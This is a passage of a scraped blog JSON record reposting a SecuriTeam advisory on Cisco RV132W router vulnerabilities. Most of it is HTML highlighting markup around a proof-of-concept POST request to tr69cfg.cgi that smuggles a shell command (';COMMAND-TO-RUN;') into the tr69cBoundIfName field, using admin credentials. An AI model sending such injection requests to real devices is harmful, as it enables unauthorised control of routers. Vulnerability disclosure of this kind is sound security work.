Gecko\/2010010  1 Firefox\/54.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  Content-Type: application\/x-www-form-urlencoded  Content-Length: 627  Referer: http:\/\/192.168.1.1\/tr69cfg.cgi  Connection: close  Upgrade-Insecure-Requests: 1    submit_button=Basic_config&amp;tr69cEnable=1&amp;tr69cInformEnable=1&amp;ipvEnable=0&amp;tr69cInformInterval=300&amp;tr69cAcsURL=http%3A%2F%2F192.168.1.1&amp;tr69cAcsUser=admin&amp;tr69cAcsPwd=admin&amp;tr69cConnReqUser=admin&amp;tr69cConnReqPwd=admin&amp;tr69cConnReqPort=7547&amp;tr69cNoneConnReqAuth=0&amp;tr69cDebugEnable=0&amp;tr69cAcsCert=&amp;tr69cCpeCert=&amp;downloadFileType=&amp;tr69cBoundIfName=;COMMAND-TO-RUN;&amp;tr69cBindInterface=ETH_WAN_R&amp;tr69=on&amp;ipv=on&amp;inform=on&amp;informInterval=300&amp;httpCategory=http%3A%2F%2F&amp;acsURL=192.168.1.1&amp;acsUser=admin&amp;acsPwd=admin&amp;debug=on&amp;FileType=on&amp;connReqAuth=on&amp;connReqUser=admin&amp;connReqPwd=admin&amp;connReqPort=7547&amp;WANInterface=eth0.1  ===<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c84765906036-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c84765906036-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-1\"><span class=\"crayon-o\">===<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-2\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr69cfg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cgi <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-3\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-4\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Macintosh<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Intel <\/span><span class=\"crayon-e\">Mac <\/span><span class=\"crayon-i\">OS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">X<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.12<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">54.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2010010<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-5\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">54.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">627<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-11\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.1.1\/tr69cfg.cgi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-12\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-13\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c84765906036-15\"><span class=\"crayon-v\">submit_button<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Basic_config<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cEnable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cInformEnable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ipvEnable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cInformInterval<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">300<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cAcsURL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3A<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2F<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2F192.168.1.1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cAcsUser<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cAcsPwd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cConnReqUser<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cConnReqPwd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cConnReqPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7547<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cNoneConnReqAuth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cDebugEnable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cAcsCert<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">tr69cCpeCert<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">downloadFileType<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">tr69cBoundIfName<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">COMMAND<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-st\">TO<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">RUN<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69cBindInterface<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ETH_WAN_R<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">tr69<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ipv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">inform<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">informInterval<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">300<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">httpCategory<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3A<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2F<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2F<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">acsURL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">acsUser<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">acsPwd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">debug<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">FileType<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">connReqAuth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">connReqUser<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">connReqPwd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">connReqPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7547<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">WANInterface<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c84765906036-16\"><span class=\"crayon-o\">===<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0037 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3590\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 11 Feb 2018 06:10:03 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8 The Cisco RV132W Wireless-N ADSL2+ VPN Router is &#8220;easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.&#8221; The vulnerabilities found are: &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3590\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Hack2Win &#8211;  Cisco RV132W Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12603,12135,11851,10757,12136],"class_list":["post-11439","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-hack2win","tag-information-disclosure","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11439"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11439\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}